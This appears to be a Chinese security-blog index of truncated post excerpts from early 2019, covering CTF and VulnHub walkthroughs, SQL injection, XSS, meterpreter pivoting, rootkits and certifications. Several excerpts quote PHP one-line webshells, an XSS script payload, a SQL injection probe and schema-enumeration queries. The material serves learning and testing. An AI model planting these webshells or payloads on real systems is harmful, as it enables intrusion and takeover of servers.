SKINNY加密算法详解(无代码,仅加密)
原作者论文请参考《The SKINNY Family of Block Ciphers and Its Low-Latency Variant MANTIS》
地址为:https: link.springer.com/chapter/10.1007/978-3-662-53008-5_5
...[2019/4/8]
上帝的归上帝,凯撒的归凯撒—— CODING 权限管理更新
上帝的归上帝,凯撒的归凯撒
《马太福音》22 章 15-22 节,耶稣用这句话,说明了神权与政权之间的正确关系,奠定了神权与政权的基础,也划清了二者的界限。其实这两个问题如今也依旧出现在公司架构中,随着数字化转型的浪潮,越来越多的企业开始使用信息化管理系统取代传统办公。在转型过程中,最大的挑...[2019/4/2]
初级安全入门——Windows操作系统的安全加固 - Hunter-J
实验网络拓扑如下:
工具简介
Kali操作系统
Kali Linux是安全业内最知名的安全渗透测试专用操作系统。它的前身就是业界知名的BackTrack操作系统。BackTrack在2013年停止更新,转为Kali Linux。Kali Linux集成了海量渗透测试、网络扫描、攻击等专用工具...[2019/4/1]
APP网站安全漏洞检测服务的详细介绍 - APT-101
01)概述:
关于APP漏洞检测,分为两个层面的安全检测,包括手机应用层,以及APP代码层,与网站的漏洞检测基本上差不多,目前越来越多的手机应用都存在着漏洞,关于如何对APP进行漏洞检测,我们详细的介绍一下.
APP代码:
代码加密解密,反混迹调试,模式器安装
&nb...[2019/3/29]
大二学生党的Security+备考宝典(一次过)
刚出成绩的一刹那,我的心里是慌的很的,因为可能知识点复习的不够扎实,考试上的题目全都回归了课本,而我的知识回归了老师(滑稽),一下给大家分享下我的经验,希望大家引以为戒,都能考出好成绩。
一、直播阶段
建议:最好全程跟着Security+直播课,哪怕有再重要的事情!!!
...[2019/3/29]
端口的渗透测试总结(转载)端口的渗透测试总结(转载)
0x00 背景
在前段时间的渗透中,我发现通过端口来进行渗透有时会提升我们的效率,所以才有了这篇文章的诞生;
首先分享一份关于端口及他们对应的服务文件:https: yunpan.cn/cYyNXEpZNYvxQ 访问密码 983e
这里再分享一篇我曾经在百度文库提...[2019/3/27]
基于VPC内的云主机安全隔离技术基于VPC内的云主机安全隔离技术
1引言
随着业务的持续发展,各行业开始逐渐将业务系统通过云计算平台进行整合,采用部分云化的架构也成为业内主流,云计算已经经历了十多年的发展历程,广电、政府、医疗、教育各行各业也开始将传统的自建IT模式转为使用公有云方式。甚至出于可控性和私密性的考虑,更多的大型企业、...[2019/3/26]
网络攻击如何影响物理世界 - -委内瑞拉大停电对于电力系统防护的思考
1、典型电力网络安全事件回顾
2003年1月,美国俄亥俄州Davis-Be e核电站和其它电力设备受到SQL Slammer蠕虫病毒攻击,网络数据传输量剧增,导致该核电站计算机处理速度变缓、安全参数显示系统和过程控制计算机连续数小时无法工作。
2006年8月,美国阿拉巴马州的Browns F...[2019/3/25]
Web安全0004 - MySQL SQL注入 - 查询语法
查库,select schema_name from information_schema.schemata;
查表,select table_name from information_schema.tables where table_schema=dbname; # 可以是database(...[2019/3/25]
简单探究丨病毒之所以能快速入侵进用户的计算机,究竟是为什么?
病毒一般是具有很高编程技巧,短小精悍的程序。通常附在正常程序中或磁盘较隐蔽的地方,也有个别的以隐含文件形式出现。目的是不让用户发现它的存在。如果不经过代码分析,病毒程序与正常程序是不容易区别开来的。
一般在没有防护措施的情况下,计算机病毒程序取得系统控制权后,可以在...[2019/3/25]
Kali proxychainsKali proxychains
1.什么是proxychains
在linux系统中有很多软件是不支持代理的,但是proxychains 却可以让不支持代理的软件
也能走代理通道,支持HTTP,HTTPS,SOCKS4,SOCKS5,等多种代理协议,而且还能配置代理链
(可以理解成多重代理),可以说是安全渗透的神...[2019/3/21]
实验吧web天网管理系统
直接查看源码
<!--$test=$_GET[''username'']>这一行
源码的下面给了我们一些提示:我们输入的username经过md5加密后会赋值给test。当test为0时就会跳出新的东西,这时候我们就要...[2019/3/18]
初级安全入门——安全漏洞的检测与利用 - Hunter-J
切记不要随意扫描公网的主机(扫描国外的另外一说),建议在自己的主机上搭载虚拟机作为靶机
切记不要在校园网内扫描!!!切记不要在校园网内扫描!!!切记不要在校园网内扫描!!!
实验网络拓扑如下:
工具简介
Kali操作系统
Kali Linux是安全业内最知名的安全渗透测试专用操作系统。它的...[2019/3/18]
一次友情协助的渗透测试 - APT-101
背景:
昨天之前的老司机找我,让我帮忙看看他们的站有啥安全问题么,他的WVS有点问题,无法扫描,知道我工具多,就当我帮他扫一波。于是乎就有了下面的场景。
废话不多说,按照老司机的要求,使用WVS 就扫描了一波...[2019/3/14]
msf中exploit的web_delivery模块
背景:目标设备存在远程文件包含漏洞或者命令注入漏洞,想在目标设备上加载webshell,但不想在目标设备硬盘上留下任何webshell文件信息
解决思路:让目标设备从远端服务器加载webshell代码至内存执行
错误尝试:远端服务器开启web服务,让目标...[2019/3/12]
Hacking HackDay: Albania - APT-101
概述:
Name: HackDay: Albania
Date release: 18 Nov 2016
Author: R-73eN
Series: HackDay
下载:
https: download.vulnhub.com/hac...[2019/3/11]
Basic Linux Privilege Escalation - APT-101
(Linux) privilege escalation is all about:
Collect - Enumeration, more enumeration and some more enumeration.
Proce - Sort through data, analyse ...[2019/3/11]
Hacking Bsides Vancouver 2018 walkthrough - APT-101
概述:
Name: BSides Vancouver: 2018 (Workshop)
Date release: 21 Mar 2018
Author: abatchy
Series: BSides Vancouver
Web page: https: www.abatc...[2019/3/8]
用meterpreter实现跳板机
meterpreter跳板机
背景:渗透测试者A拿到了B主机的控制权,但没有拿到 h密码(不能打 h隧道)。现需横向移动渗透内网主机C,为了避免动作过大不便直接在B上对C进行渗透,其中C不能出公网。现需让B转发A到C的流量,并最终使C反弹shell至A。
...[2019/3/8]
一道简单的CTF登录题题解
一、解题感受
这道题50分,在实验吧练习场算比较高分,而且通过率只有14%,比较低的水平。
看到这两个数据,一开始就心生惬意,实在不应该呀!
也是因为心态原因,在发现test.php之后,自以为在SQL注入时只要能截断后面的SQL语句,FLAG就在user里面,尝试了一段时间SQL注入...[2019/3/7]
APP网站安全漏洞检测服务的详细介绍
关于APP漏洞检测,分为两个层面的安全检测,包括手机应用层,以及APP代码层,与网站的漏洞检测基本上差不多,目前越来越多的手机应用都存在着漏洞,关于如何对APP进行漏洞检测,我们详细的介绍一下.
APP代码:代码加密解密,反混迹调试,模式器安装
APP应用:跟网站漏洞检测是一样的,主要是一...[2019/3/6]
信息安全行业含金量较高的2个认证(建议都看一下)信息安全行业含金量较高的2个认证(建议都看一下)
1、CISSPCISSP是目前世界上最权威、最全面的国际化信息系统安全方面的认证。CISSP的涉及面很广,基本覆盖了安全的各个领域,而且会根据行业新形势的变化相应加入新的内容。如目前更新的教材中,移动安全、云安全、工控安全等技术全都包括其中。通过学习CISSP,可以与业内绝大多数人员的理念保持基本...[2019/3/6]
Get與Post的區別--總結隨筆
關於Get與Post的區別的文章,在網上太多了;有優點有缺點,今天我給各位大哥做一個總結性的隨筆,還請多多包涵~
首先是W3School上的答案,請查收:
GET在浏览器回退时是无害的,而POST会再次提交请求
GET产生的URL地址可以被Bookmark,而...[2019/3/6]
redis未授权访问批量验证脚本编写[python]redis未授权访问批量验证脚本编写[python]
漏洞简介
简单来说,redis是一个数据库。在默认的配置下,redis绑定在0.0.0.0:6379,也就是说,如果服务器有公网ip,可以通过访问其公网ip的6379端口来操作redis。最为致命的是,redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器...[2019/3/4]
1.SDL介绍 - APT-1011.SDL介绍 - APT-101
01.什么是SDL
SDL是微软提出的一种软件开发安全生命周期管理的一种最佳安全实践,全称为Security Development Lifecycle。
SDL是微软软件开发安全保障流程,结合了软件开发整个生命周期,将安全工程师嵌入到整个开发流程,和研发一起来协同工作保障整个软件生命周期内...[2019/2/28]
3.SDL落地方案 - APT-1013.SDL落地方案 - APT-101
01.安全培训
安全意识培训(全员)
邮件安全
钓鱼邮件
邮件伪造
第三方转存
检查发件人
开启二次验证
邮件转发
第三方代收
邮件附件敏感信息加密
病毒防范
什么是木马病毒
我安装哪些杀毒软件?
定期更新病毒库
浏览器安全
...[2019/2/28]
【转载】 禁止国外IP访问你的网站
在网站的运维过程中,我们通过网站记录的IP列表记录有时候会发现很多国外的IP的访问,如美国的IP等,而很多的服务器攻击行为的发起点很有可能在国外,此时为了服务器安全的考虑,我们可以考虑禁止国外IP访问你的网站,当国外的IP访问你的网站的时候,直接停止向其提供服务。
如果你使用的服务器是云服务器...[2019/2/28]
Android 应用的逆向和审计 - APT-101
Android 应用程序拆解
Android 应用程序是在开发应用程序时创建的数据和资源文件的归档文件。 Android 应用程序的扩展名是.apk,意思是应用程序包,在大多数情况下包括以下文件和文件夹:
Cla es.dex (文件)
AndroidM...[2019/2/27]
反逆向技术 - APT-101反逆向技术 - APT-101
五大反逆向技术:
代码混淆、针对不同逆向工具保护技术、增加逆向难度(java代码native化)、动态加载技术、代码验证技术
代码混淆:
工具:proguard
常用操作:保留选项、压缩、优化、混淆。
功能:
混淆代码(注意使用混淆文件的时候需加入自己的具体操作以防程序无...[2019/2/27]
使用meterpreter让没有安装python解释器的肉鸡设备执行任意python程序
目标设备不需安装python解释器就能让其执行python程序
# 需要在与目标meterpreter的se ion中加载python模块
meterpreter > load python ====>先要加载python插件(我猜这个动作是将pyth...[2019/2/26]
Hacking Box Droopy: v0.2 - APT-101Hacking Box Droopy: v0.2 - APT-101
概述:
目标:get flag
下载链接: https: www.vulnhub.com/entry/droopy-v02,143/
工具: kail linux
开工
1)扫描开道:
# netdiscover -r 10.10.202.0/24
...[2019/2/26]
Git 最新版本2.20.1 安装及配置
我们先去官网下载地址,去下载。
https: git-scm.com/downloads
1.
2.
3.
双击 Git-2.20.1-64-bit.exe 安装
4.
5.
6.
7.
8.
9.
设置环境变量(选择使用命令行环境)
Us...[2019/2/25]
Winrar目录穿越漏洞复现
Winrar目录穿越漏洞复现
1、漏洞概述
WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在Windows环境下的图形界面。2019年 2 月 20 日Check Point团队爆出了一个关于WinRAR存在19年的漏洞,用它来可以获...[2019/2/25]
入侵感知系列之反连检测
反连检测
背景:
黑客入侵完成后为了方便下次“关顾”一般都会留下后门程序,此时断绝黑客的“后路”就显得尤为重要了
目的:
通过多种维度组成多种方案来帮助管理员尽可能快的发现恶意网络连接
注意:
多种方案可叠加使用,方案与方案之间无互斥关系...[2019/2/22]
网络安全红蓝军对抗完整战术周期
传送门:https: huntingday.github.io/title/2019/02/15/
原文链接:http: www.cnblogs.com/meandme/p/10405684.html[2019/2/21]
如何查看本机是否是虚拟机
windows:
在cmd环境下使用systeminfo查看
物理机:
系统制造商: To be filled by O.E.M.
系统型号: To be filled by O.E.M.
虚拟机:
系统制造商: ...[2019/2/21]
Hacking /dev/random: Pipe - APT-101
1) 下载镜像,虚拟机启动
https: download.vulnhub.com/devrandom/pipe.ova
2) nmap 扫描探测
Nmap 扫描开路:
╰─ nmap -Pn -sV -p- 10.10.202.0/24
Nmap scan ...[2019/2/19]
记一次博客被群压的经历
前言
前段时间,博客和论坛都放到的阿里云新购的三年 T5 实例服务器上,等都转移过去才发现,所谓的 T5 实例只能满足10% 的 CPU 峰值。期间经历了各种卡顿、死机,最终又把博客单独迁移了回来。静态文件走 CDN,文章都 Redis,以为万事大吉了就。
群压
然并卵,有一天,群里有网友说...[2019/2/18]
Security+认证812分轻松考过(备战分享)
2019.02.12,开工第一天,我参加了security+考试并顺利通过了考试,812分的成绩有点出乎我的意料,据我所知我周围还没有人考过800分的。怀着愉悦的心态分享下我的备考经历和考试经验。
备考过程
我是2018年11月在安全牛课堂报名的,12月份参...[2019/2/18]
Dvna for Owasp top 10 2017 - APT-101Dvna for Owasp top 10 2017 - APT-101
简介:
DVNA(Damn Vulnerable Node Application),它是一款由Node.js打造的知名WEB漏洞测试平台,或许有些朋友已经使用过。它是用来给使用Node的WEB开发人员演示如何进行安全编码,以及让网络安全爱好者进行夺旗比赛的平台。其中,这个平台里包含常见的WEB漏...[2019/2/18]
kernel pwn 入门环境搭建
刚开始上手kernel pwn,光环境就搭了好几天,应该是我太菜了。。
好下面进入正题,环境总共就由两部分构成,qemu和gdb。这两个最好都需要使用源码安装。
我使用的安装环境为
qemu:安装前要先安装
sudo apt-get install libsdl2-2.0
sudo a...[2019/2/18]
XSS 漏洞介绍 - APT-101XSS 漏洞介绍 - APT-101
概念:
XSS 攻击:跨站脚本攻击 (Cro Site Scripting),为不和层叠样式表 (Cascading Style Sheets, CSS) 的缩写混淆。故将跨站脚本攻击缩写为 XSS。
XSS 是一种经常出现在 web 应用中的计算机安全漏洞,它允许恶意 web 用户将代码...[2019/2/18]
XSS Challenges - APT-101
平台:
http: www.zixem.altervista.org/XSS/
level1:
Payload:
http: www.zixem.altervista.org/XSS/1.php?name=zxm<script>alert(1...[2019/2/18]
SQL Challenges - APT-101
平台:
http: www.zixem.altervista.org/SQLi/
Level 1 (Super Easy)
http: www.zixem.altervista.org/SQLi/level1.php?id=1
http: www.zixem.altervi...[2019/2/18]
RSA签名的PSS模式
本文由云+社区发表
作者:mariolu
一、什么是PSS模式?
1.1、两种签名方式之一RSA-PSS
PSS (Probabilistic Signature Scheme)私钥签名流程的一种填充模式。目前主流的RSA签名包括RSA-PSS和RSA-PKCS#1 v1.5。相对应P...[2019/2/15]
rootkit(kbeast-v1)
Rootkit有应用级、内核级和硬件级
用的比较多的是内核级别,比如基于linux LKM编写的rootkit
rootkit可以理解为一个超级管理员的工具箱,这个工具箱通过调用系统LKM接口可以动态实现对内核功能的修改,从而实现相比普通后门程序...[2019/2/13]
身份认证与加密浅谈(PKI)
利用PKI体系解决私密文件传输中一系列问题的大体思路 背景:现有A用户和B用户之间想加密传输一些秘密文件,通过什么样的技术可以确保A和B传输数据的安全性? 方案:采用对称秘钥对数据进行加密传输(对称加密算法计算效率高,速度快) 解决的问题:私密性 算法:AES、3DES、DES等 工作原理:A用...[2019/2/12]
几种好用的经典webshell(php)几种好用的经典webshell(php)
php经典一句话: <?php echo shell_exec($_GET[''cmd'']);?>
中国菜刀: 官网:www.maicaidao.co 原理:上传一句话(<?php @eval($_POST[''我是密码'']);?>)至服务器端,再用中国菜刀客户端(...[2019/2/11]
Kali学习笔记38:文件上传漏洞
早些年,提到Web渗透,或者搜索一些黑客教程
基本都会看到文件上传漏洞。
它是一个很经典的漏洞
但它本质其实不是一个漏洞,而是网站本身的上传文件功能
不过如果我们上传了Webshell,那么就成为了文件上传漏洞
打开我们的靶机Metasploitable:
这里就是我们...[2019/2/11]
Kali学习笔记39:SQL手工注入(1)
终于到了SQL注入
最大的、最经典的、最常见的Web漏洞就是SQL注入漏洞
SQL注入的原理这里就不说了,百度
打开DVWA,SQL注入测试模块
测试单引号,发现出错,于是想到测试语句:
1'' or ''1''=''1
成功:
&...[2019/2/11]